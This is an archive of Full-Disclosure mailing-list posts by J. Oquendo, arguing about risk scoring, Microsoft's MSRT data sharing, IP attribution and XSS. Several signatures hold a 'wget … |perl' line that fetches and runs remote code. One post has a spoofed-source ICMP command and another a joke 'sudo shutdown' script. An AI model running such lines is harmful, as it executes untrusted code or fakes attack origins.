recall a single instance in which someone intending to attack came from
the source it appeared to have come from, said Dale W. Meyerrose,
former chief information officer for the Office of the Director of
National Intelligence. Most attackers in cyberspace try to mask who
they really are. (NY Times)

“The code is really pretty elementary in many respects,” he added. “I’m
doubting that the author is a computer science graduate student.” Jose
Nazarrio

I put my money on Arbor's view. Remember, earlier this year according to
media and government, China was all the rage. Budgets were passed and
ironically all the Chinese hackers in the world retired. Think about
that for a minute or two. It could make a good episode of Where are
they now? In the interim, politics will be what politricks will be:

dod-contractor:~# nemesis-icmp -S 202.130.245.42 -D 127.0.0.1 -i 4 
echo China's cyberattacking us! We're simply underfunded |mail -s
Cyberwarefare Siobhan.Gorman at wsj.com


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Introducing RMBSS - Risk Metrics Budgetary Scoring System

2009-03-31 Thread J. Oquendo

Infiltrated Research Group is proud to introduce RMBSS Risk Metrics
Budgetary Scoring System. A synergy of best practices frameworks
that synchronizes industry known security frameworks for more
thorough Risk Assessments and Analysis. The concept was born out
of the need for Information Security Managers (CSO's/CIO's/CISO's)
to realize value added security metrics. While our initial version is in its
preliminary stages, we're confident that our improved methods of
security correlation events in an architecture will guarantee proven
actionable security results. 


Infiltrated Research Group

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

Enough research will tend to support your
conclusions. - Arthur Bloch

A conclusion is the place where you got
tired of thinking - Arthur Bloch

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-02-27 Thread J. Oquendo
On Fri, 27 Feb 2009, Thierry Zoller wrote:

 
 If we want to arrive at a state where risk can be managed, it needs
 to be measured. And if we aren't that far in 2009 I pity us all.

One of the most difficult tasks in risk management has always
been the measurement factorability. Many books have been published,
almost all give differing points of view on quantitative, qualitative,
theoretical postures and we can continue to puke on the math.

Security metrics (which happens to be an excellent book) is
probably one of the most insane topics with regards to security
management. We can never get to a degree of real world numbers
because everyone's view will be different. So let's place this
Safari bug for example as a high impact and use CVSS as a guide:

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS Base Score 10
Impact Subscore 10
Exploitability Subscore 10
CVSS Temporal Score 9
CVSS Environmental Score 9.4
Modified Impact Subscore 10
Overall CVSS Score 9.4

Now how can I place this into the equation of my current
infrastructure's security posture? No one here uses a MAC
let alone Safari for Windows so technically this doesn't
affect me. However, from time to time, we may have a vendor
come in, get thrown on a network after connecting to a NAC
device, at that instance should I revamp the numbers? Surely
I'm placed at risk.

It's easy to say if we aren't that far in X hell we aren't
far enough to have IPv6 fully deployed after so many years
let alone for the security community to be able to come up
with a definitive risk metric scale. The problem is, who
is doing the math - compounded by terms like risk appetite
and fuzzy math tricksters. Risk Appetite sorry my stomach
is full. It's a horrendous concept.

Pick your poisonous organization, ISACA, ISC2, OGC. They
will all give you a methodology into measurement practices
and almost certainly all can be tweaked like a magician
with a slight of hand to make the most extreme exploit look
harmless and the most harmless look extreme.

By the way, I'm now selling a Risk Management and Scoring
tool for $19.99 that will allow you to enter a program and
define what you think the risk is. The program will allow
you to pick your target: CIO, CEO, CSO. It will then go
out and create a custom chart to maximize your budgetary
request or downplay a potential threat.

What's going on Thierry, Mike.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

Enough research will tend to support your
conclusions. - Arthur Bloch

A conclusion is the place where you got
tired of thinking - Arthur Bloch

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Hotel Network Security: A Study of Computer Networks in U.S. Hotels

2008-10-02 Thread J. Oquendo
On Thu, 02 Oct 2008, Josh Ogle wrote:

 the technology exists to increase a hotel network?s security, a hotel 
 could potentially be considered at fault for not taking the necessary 
 precautions to protect their guests from hackers.

FYI, just because the technology exists does not mean
hoteliers have to run out and accomodate everyone in
deploying these technologies. If employees were trained
in the risks associated with technology, many of these
technologies would go the way of the dinosaur.

Supposing someone made you aware of the danger of
logging into a network because of the impact of
sniffers. Would you PERSONALLY be cruising random
hotspots. If you knew definitively the person who
runs the network could see and record everything
you did, I'm sure the chances of you picking up
any network to surf on would diminish.

Many people aren't aware of the dangers and this
is the root of the problem. Technology is nothing
more than a stepping stone. Corporations have the
capabilities (or should have) to protect their
assets on a layered approach and instances like
this - employees hooking up from a hotel - can be
mitigated way before the fact. Its called policy.



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, CNDA, CHFI, OSCP

A good district attorney can indict a ham sandwich
if he wants to ... The accusations harm as much as
the convictions ... they're obviously harmful or it
wouldn't be news.. - John Carter

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-08 Thread J. Oquendo
On Thu, 08 May 2008, Paul Schmehl wrote:

 You're comparing apples with oranges.  The is precisely the muddying of the
 waters that J. Oquendo is seeking to stir up emotions.

And you know me this well to infer it's stirring up emotions. I call it
raising awareness. You have your interpretation of what you read, I have
mine. Is yours wrong Paul. You state waa waa waa I ran the tool it did
nothing therefore you are wrong J. Oquendo I'm Paul Schmehl! Did you
run it on an infected machine Mr. Schmehl. No so please explain how you
yourself did not muddy this water.

 It clearly says that on the download page.  It's not Microsoft's fault if
 you don't bother to read it.

It is Microsoft's fault for not being honest period no ifs ands or buts.
Please give us your professional correlation of the article. Information
obtained from MSRT was used to track botnet hunters in cahoots with another
tool.

 Yes, their web page (I don't see any EULA) states that they don't collect
 personally identifiable information.  Furthermore, the botnet tool is a
 separate tool.  The page also states that after the tool is run, it deletes
 itself.  So, when you are infected with something, the tool will detect and
 clean it *and* send some information about the infection back to M$.

Can you please find this page. I showed you mine show me yours or just STFU
for now, otherwise the my cojones are bigger than yours becomes redundant
nonsense. EOS

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-08 Thread J. Oquendo

 Of course, with the weasel words may have, inadvertently and
 potential, you can always claim you never really said that, but you know
 exactly what the reader will take away from that headline - What???
 Microsoft installed a backdoor on my computer
 Microsoft installed a backdoor on my computer

 Then you make this amazing leap of logic.

This is your interpretation my CORRELATION. If it did not obtain info
from MSRT how would have MS created the Botnet tool. I'm not making
any amazing leaps of anything other then correlation. If they didn't
they shouldn't have mentioned it in the article. You don't see any
Ferrari mechanics start talking about Ferrari engines in a mechanics
article, and next paragraph talk about speed and not correlate it with
a Ferraris that would be insanely stupid. Gee Wilbur I don't mean
Ferrari I meant a Yugo.

 So, in one sentence you tie the MSRT to the botnet buster and go from it
 sends data to it spies on you.  Nice try, but you're not fooling anyone
 except fools.

How did I tie anything. Microsoft implies this in their article in
MY interpretation. Again, I don't know about you but I've never had
the exposure you have to see someone do so.

 BTW, a backdoor program is something that allows me to access your computer
 without your knowledge any time I want to, not a program that sends me
 information whenever you choose to run it *if* you choose to send it.
 Again, nice try, but you're not fooling anyone except fools and conspiracy
 theorists.

And you're the architect of this definition? I used the Wiki entry:

/ READ 
A backdoor in a computer system (or cryptosystem or algorithm) is a method
of bypassing normal authentication, securing remote access to a computer,
obtaining access to plaintext, and so on, while attempting to remain
undetected. The backdoor may take the form of an installed program (e.g.,
Back Orifice), or could be a modification to an existing program or
hardware device.
/ END READ

I don't know about you but one, I never agreed to share the information
with MS in the first place. THEY IMPOSED IT. And your argument about
removing it is MOOT. This is my MAIN RANT. ASK ME BEFOREHAND DON'T
ASSUME I AM YOUR GUINEA PIG. Does this register logically to anyone
else. The argument here isn't about what MS is actually doing with the
information, if they told me beforehand I would have the OPTION to
provide information. I wouldn't have had it shoved down my throat
because Microsoft is trying to assist LEA. You're missing the entire
GIST of it.

If you understood more about me, you would have known better to label
this as theorist or alarmist. Facts are facts. Is MS obtaining info
from my machine YES Is MS passing information obtained from my machine
to LEA YES. Is it identifiable. YES IP IS USED AS AN IDENTIFIER either
way you cut it. I could care less whether or not if they are or aren't
using the information. FACT LEA WILL ATTEMPT TO IDENTIFY YOU VIA IP.
FACT YOU ARE IDENTIFIED IN THE FORM OF AN IP THE MOMENT YOU CONNECT.
You CONNECTED did the packets get there via RFC2549. FACT. Did MS
ever notify me they would be sharing information NO. FACT.

We could copy and paste until the cows come home. I stand by what I
state and at this point its a matter of interpretation. You can infer
what you'd like by my FACTS but they are what they are according to
what was disclosed by Microsoft NOT ME.

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

Experience hath shewn, that even under the best
forms (of government) those entrusted with power
have, in time, and by slow operations, perverted
it into tyranny. Thomas Jefferson

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-07 Thread J. Oquendo
On Wed, 07 May 2008, Paul Schmehl wrote:

 And that relates to the MSRT how?

Relates to MSRT sending your information. It only sends information
when it finds something. I never stated it sends all your information
all the time.

 Now you're being silly.  You're claiming that *realtime connection 
 information* is included in the data that is sent but without any grounds 
 to do so and despite Microsoft's claims to the contrary.  And without any 
 proof.
 

Pick up a dev machine load it with malware, run MSRT, and sniff it. You'll
see what it sends and remember LEA uses IP as an identifier bottom line.

 You might try it some time.  Getting the facts beats wild speculation and 
 hyperbole every time.  I just installed MSRT on my laptop and ran it while 
 Wireshark was monitoring all external communications.  It sent exactly 
 *zero* information to MS.

It sent zero information because it did not detect anything malicious.
As for paranoia, has nothing to do with paranoia. Facts. Fact 1) Is MS
sending information from your machine to them ... Yes Fact 2) If something
malicious is detected on your machine will it go to MS. Yes. Fact 3) Will
they share information obtained from YOUR machine via YOUR IP address
will they share that information with LEA? According to the MS spokesman
they will. Fact 4) Can LEA correlate the information sent from your machine
to an IP address... Yes.

Go back and look at the information MS is obtaining it's in the log file.
So looking at Sasser, lets fiddle with this:

 
Quick Scan Results:

Found virus: Win32/Sasser.A.worm in file://C:\WINDOWS\avserve.exe
Found virus: Win32/Sasser.A.worm in 
regkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Found virus: Win32/Sasser.A.worm in 
runkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Found virus: Win32/Sasser.A.worm in file://C:\WINDOWS\avserve.exe
 
Quick Scan Removal Results

Start 'remove' for 
regkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Operation succeeded !
 
Start 'remove' for 
runkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe
Operation succeeded !
 
Start 'remove' for file://\\?\C:\WINDOWS\avserve.exe
Operation succeeded !
 
Results Summary:

Found Win32/Sasser.A.worm and Removed!
 
Return code: 6
Microsoft Windows Malicious Software Removal Tool Finished On Mon Mar 19 
13:15:57 2007

(from there website).

Now according to their article and common logic, in their article they stated
they obtained samples of the infection to track the CNC of a botnet. How did
they get this is up in the air, but with their forced update history, its
possible on detection they can actually send avserve.exe right back to 
themselves.

Anyhow, so I create something crafted to implicate you - using my previous
analogy of being a botnet CNC owner, my program implicates your network
you take the fall. People pull Joe Jobs all the time.

 Not all of us are consumed by paranoia and unfounded fears.  Some of us 
 actually approach security from a rational, intelligent perspective and 
 attempt to mitigate risks to the best of our abilities while accepting the 
 fact that we can't stop every attack.

A Joe Job is an unfounded fear? How about poisoning the well. What happens
if someone reading this decides to put it to the tests nullifying any
verifiable, concrete snapshots with garbage. Then what will be of the
tool? e-Garbage truck?

 I don't consider fantasizing about bogeymen thinking outside the box.

Fantasizing has nothing to do with reality. People are paying top dollars
in life to screw someone all the time whether its online or not. This is
another stupid mechanism someone can use. Its a flawed concept albeit nice
idea.


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-06 Thread J. Oquendo
On Tue, 06 May 2008, Ken Schaefer wrote:

 I'm not sure the facts in evidence support the conclusions reached here 
 (sorry, not posting inline as I don't want to address each conclusion built 
 upon some other shaky conclusion.
 
 From http://support.microsoft.com/kb/890830
 
 ==
 
 Either I am missing the point of J. Oquendo's post, or the conclusions I 
 think he reaches are speculation rather that established.
 
 Cheers
 Ken
 

Unsure if this made it to the list the first time, therefore I will re-take.
Outside of technical quoting I will lay it out in understandable terms.
Microsoft DOES NOT NOTIFY THE END USER THAT INFORMATION TAKEN FROM THEIR
MACHINE WILL BE FORWARDED TO ANYONE OUTSIDE OF MICROSOFT.

This *IS NOT* speculation but fact. Since you provided the link for us,
please go back and specify where Microsoft is telling us the information
they gather from Windows Malicious Software Removal WILL BE sent to
LAW ENFORCEMENT AGENCIES inside or outside the United States.

Please read the article and the wording:
http://www.pcworld.com/businesscenter/article/145257/microsoft_botnethunting_tool_helps_bust_hackers.html

/QUOTED
The software vendor is giving law enforcers access to a special tool that keeps 
tabs on botnets, using data compiled from the 450 million computer users who 
have installed the Malicious Software Removal tool that ships with Windows.
/ END QUOTE

Please find me anything in the EULA for WMSR tool that specifies they
will do as they see fit with data from my machine?

Now what's to stop them from using the same principle in the future:
We obtained information before, no one cared. RIAA cares to get a
baseline of how many Windows users have MP3's. Farfetched? I think
not. What happens a-la ATT wiretaps where Microsoft decides to say
obtain whatever information they'd like regardless of telling you
what they're doing with that information.

So you argue... Reporting is optional... It sure is, but what do
you think the response would be from MS users if MS stated We will
send your information to Law Enforcement agents anywhere...

/QUOTED:
In February, the S?ret? du Qu?bec used Microsoft's botnet-buster to break up a 
network that had infected nearly 500,000 computers in 110 countries, according 
to Captain Frederick Gaudreau, who heads up the provincial police force's 
cybercrime unit.
/ END QUOTE

Missing the part? Its black and white. If MS wasn't using information (flawed
since it's relying on IP) then how did they correlate IP information
back to law enforcement... OUTSIDE the United States...


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsot DID DISCLOSE potential Backdoor

2008-05-03 Thread J. Oquendo
 that there are far too many open 
WiFi 
hotspots in the world to conclusively narrow a fact. We have an assumption that 
an 
attacker is behind 10.10.10.159. Can we see them? No. All we know is the 
address. Being 
I've used a private address, I won't bother diving into but he came from ISP X 
in 
Nebraska. Irrelevant. What you have is a fishing expedition.

/ SNIP
For more on this false sense of ID-via-IP: Well, let me ask you you think 
171.70.120.60 
is. I'll give you a hint; at this instant, there are 72 of us.

Here's another question. Whom would you suspect 171.71.241.89 is? At this point 
in 
time, I am in Barcelona; if I were home, that would be my address as you would 
see it, 
but my address as I would see it would be in 10.32.244.216/29. There might be 
several 
hundred people you would see using 171.71.241.89;
/END SNIP

I implore you to read a NANOG thread 
http://readlist.com/lists/trapdoor.merit.edu/nanog/6/33246.html
Professionals know, IP is an inaccurate identifier so why does it seem that  
Microsoft
along with LEO are relying on this. Makes a great baseline sure, but is 
certainly ripe
for abuse

Again, please understand what I am stating, this is not to say that its a 
horrible idea, its 
a start, a baseline - but not a definitive measure of determining who is 
controlling a bot, 
who created the botnet, etc.

Looking at past history, unfortunately you have the tinkerers; so what happens 
to an up-
and-coming security buff who is getting into the field and stumbles upon a 
botnet. Sure 
he was moronic to join an irc channel filled with bots, sure he was idiotic in 
downloading 
the code for the sake of learning. Fact is he might have. Guess what will 
happen to him 
when a Law Enforcement Agency raids his house? Guess what will happen when that 
agency needs funding for a new uber Cyber(buzzword)Crime fighting department. 
You 
guessed it. Hey Up-and-coming security buff... Kiss your terminal goodbye, 
and from 
here on out, your dreams of becoming the next Bruce Schneier will be close to 
non-
existent. It happens.

Anyhow, re-emphasizing... Shame on Microsoft for forwarding your data without 
telling 
you. Shame on Microsoft for not asking you if you wanted to PARTICIPATE in 
sending data. Shame on Microsoft for not explicitly stating: The data we are 
sneaking off 
your computer will be sent to government agencies of our choice. Its a horrible 
practice 
and a damaging breach of trust. Their action worries me as a security 
professional, will 
they ever scour for data for profit. Why not, no one would notice or care 
anyway.

J. Oquendo
sil @ infiltrated dot net

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] IE/Windows blocking Firefox downloads?

2008-03-03 Thread J. Oquendo

Jan Clairmont wrote:

Never had a problem with those.   Anyone know a quick fix other than 
re-loading a sane OS?


Try sfc /scannow from a command prompt

--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread J. Oquendo


You need to check your spelling. Libel != Lible

Death -- Yes, legally, it is no problem to speak ill of the dead. For 
example, in James Bamford's The Puzzle Palace, a book about the National 
Security Agency, a former government employee is called a Russian spy 
even though he was never convicted of anything other than contempt of 
court. The family considered a defamation lawsuit, but learned that it 
was impossible because the subject was dead. In some cases, a libel suit 
filed by a person who dies may be continued, but relatives of a dead 
person cannot bring a libel suit.


http://www.radford.edu/~wkovarik/class/law/1.5libel.html



--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread J. Oquendo

Simon Smith wrote:

Ok,

Big deal I typed it wrong once. More significantly, your interpretation
of what I wrote is inaccurate. Why are you supporting the trolls?


Did you see any support of any trolls? I stay out of trolling. Besides 
death is death, its a sad loss but life moves on. People come, people 
go, had I known him I'd make a comment to no one on a public forum since 
it wouldn't be the right medium. Maybe flowers or a condolence card to 
his family would have been my route. I have little time for trolling 
especially to spit on someone who's not around to defend himself. I've 
no opinion of JP other then he seemed to be a knowledgeable person 
unlike many a poster here. I don't play the suck up game either he will 
be greatly missed. I'm sure his family and friends will miss him and I 
hope they cherish his memory lest they become robots, as for me, I 
didn't know him to make a comment. My comment was towards you and your 
incorrect ASSumption of law.



--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Layer 9 Corporation ( D )

2008-02-06 Thread J. Oquendo

secreview wrote:

We do take a few points away from Layer 9 because they resell third 
party hardware and software. We feel that companies who resell third 
party technologies become bias towards selling those technologies even 
if a better technology solution exists. This might not stand true for a 
business that makes such a strong effort to be honest like Layer 9, but 
it most certainly is true for most IT Security Providers.


Where I work we re-sell third party products and its based on an 
assessment of what the client needs. There is no one size fits all 
solution. When I contracted at a company I won't mention (one of the top 
5 computing companies) we re-sold Juniper Netscreens to migrate out 
Checkpoint to one of our clients because it fit their need. We could 
have sold them bigger equipment to accommodate for it at a higher price.


You and whomever else your cohorts are need to take a better look at 
security design as a whole instead of shooting off rambling messages 
such as these. Let's go back to 1998, 1999 pre @Stake the corporation. 
One would have cringed at L0pht's site from a CTO perspective. Does that 
mean you would have belittled them in your (pseudo)security review.


Perhaps when you called Layer9 they didn't want to be bothered with your 
BS. Perhaps somewhere there is on this list and awaited your call. I 
don't know I don't work for them.


We also noticed that Layer 9 seems to be more geared towards offering IT 
services than Professional IT Security Services. They sell PIX firewalls 
and discuss services that are designed to help their customers improve 
the performance of their IT Infrastructure. They do not offer the more 
advanced IT Security Services.


Name me one of the top 20 Fortune 500 companies that doesn't resell 
these services. You think companies don't farm out work?


Based on the little bit of information that we were able to collect 
about Layer 9, it is our opinion that Layer 9 is a trustworthy company 
that will only offer services to their customers that they are capable 
of delivering. We can not comment on the talent or capabilities of Layer 
9 as we couldn't find any information related to that. Likewise, we can 
not comment on the quality of their services.


Based on the reviews you guys put out, I take you as serious as I take 
that Indian kid ockknock whatever the hell his name was. WTF is this 
idiot talking about. If I were a CSO why would I want to take you 
serious, why should I take you serious. Let's be logical here. What are 
your credentials. What certs do you possess, how long have YOU been in 
the industry, where have you worked, what have YOU done for the security 
community.


Get a real job.

--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread J. Oquendo

SecReview wrote:
Nate, 
Your email was constructive and much appreciated. We'll go over 
the review a second time and incorporate some of your suggestions. 
Thank you for taking the time to provide so much good feedback.




Hey all, I'd like to get into reviewing security companies as well.
Before I do though I'd appreciate it if someone could provide me
with information on the differences betweens statistical sampling
over judgmental sampling. I wouldn't want to write a review that
could affect someone's livelihood without knowing what the differences 
are between say change management and mitigation management.


And to the older security folks on the list keeping quiet (not those 
between the ages of tenteen and 19):


eW91IGNhbiBwYXkgdXMgdG8gd2hvcmUgeW91ciBjb21wYW55Cg==

Cheap too!



--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] on xss and its technical merit

2007-12-12 Thread J. Oquendo
Byron Sonne wrote:

 In terms of a technically interesting challenge, it sounds about as
 exciting as picking fights with 10 year olds. Shit man, most of this
 stuff is more about fooling people than anything. Yawn. I was bored
 tricking or weaseling passwords out of datacentre employees over the
 phone 20 years ago. Now I'm supposed to get excited 'cos some retards
 are doing it over the web?

I agree to an extent however I do know some pretty skillful people on
all sorts of levels use xss in conjuction with leveraging a network.

 A safe assumption. In fact, if it's on the web, it's a safe assumption
 it's crap anyways. Or is that Crap2.0?

What's that old adage on assume. Forward facing sites can be
leveraged to disclosure other information. E.g., Write an XSS to run
commands on the system itself for say a week. Eventually you will see
signs of someone logging into said system. Construct an XSS attack to
embed the necessary tools to leverage your way into the backbone. Not
unlikely a difficult thing to do considering you managed to XSS attack
the site in the first place.

What you/we see too often on this and other mailing list is stupidity
a-la I just XSS and popup up w00t now give me credit! That is not what
I consider a hack I consider it stupidity. What would have impressed me
would be someone using a curl POST with a proxy, dumping binaries and
having those binaries run with the user privileges of the webserver. One
misconfigured webserver (chown -Rf root:wheel) and its a wrap.


-- 

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent. Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] mac trojan in-the-wild

2007-11-02 Thread J. Oquendo
Dude VanWinkle wrote:

 A program installed under false pretenses that will give the
 author/distributer remote access to the victim machines.

Right... Guess those local are not a threat.

 -JP

Vranisaprick is that you


-- 

J. Oquendo

SGFA (FW+VPN v4.1)
SGFE (FW+VPN v4.1)

I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent. Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Spike in SSH scans

2007-10-22 Thread J. Oquendo
Adrian wrote:
 Yeah, some of those ips also tried to login on my server as 'mysql' and
 'root'.
 Even my university is part of that crappy botnet. :x
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

http://atlas.arbor.net/service/tcp/22 +66.0 % as of yesterday.

-- 

J. Oquendo

SGFA (FW+VPN v4.1)
SGFE (FW+VPN v4.1)

I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent. Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New term RDV is born

2007-09-28 Thread J. Oquendo
[EMAIL PROTECTED] wrote:

 Two months is still recently. Think about In recent history we invaded
 Iraq, In recent times terrorism has become more prominent.

 The real problem here is that 0-day originally meant previously
undisclosed
 vulnerability/exploit.  The term lost its usefulness when all the hacker
 wannabe's started posting I found a 0-day, when what they really had was
 a *yawn*-we've-been-waiting-18-months-for-vendor-to-fix-day.

Which reminds me, I recently found a vulnerability on all open source
based systems. Seems like whenever there is a program called sudo
installed on the machine - any user can run a command with root
privileges on that machine if sudo is properly configured to allow the
user to do so.

#!/bin/sh
# sudUmb

echo pwnd
sudo shutdown now

# insert one million shout outs to etards here



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-25 Thread J. Oquendo
Crispin Cowan wrote:


 This is a perfectly viable way to produce what amounts to Internet
 munitions. The recent incident of Estonia Under *Russian Cyber Attack*?
 http://www.internetnews.com/security/article.php/3678606 is an example
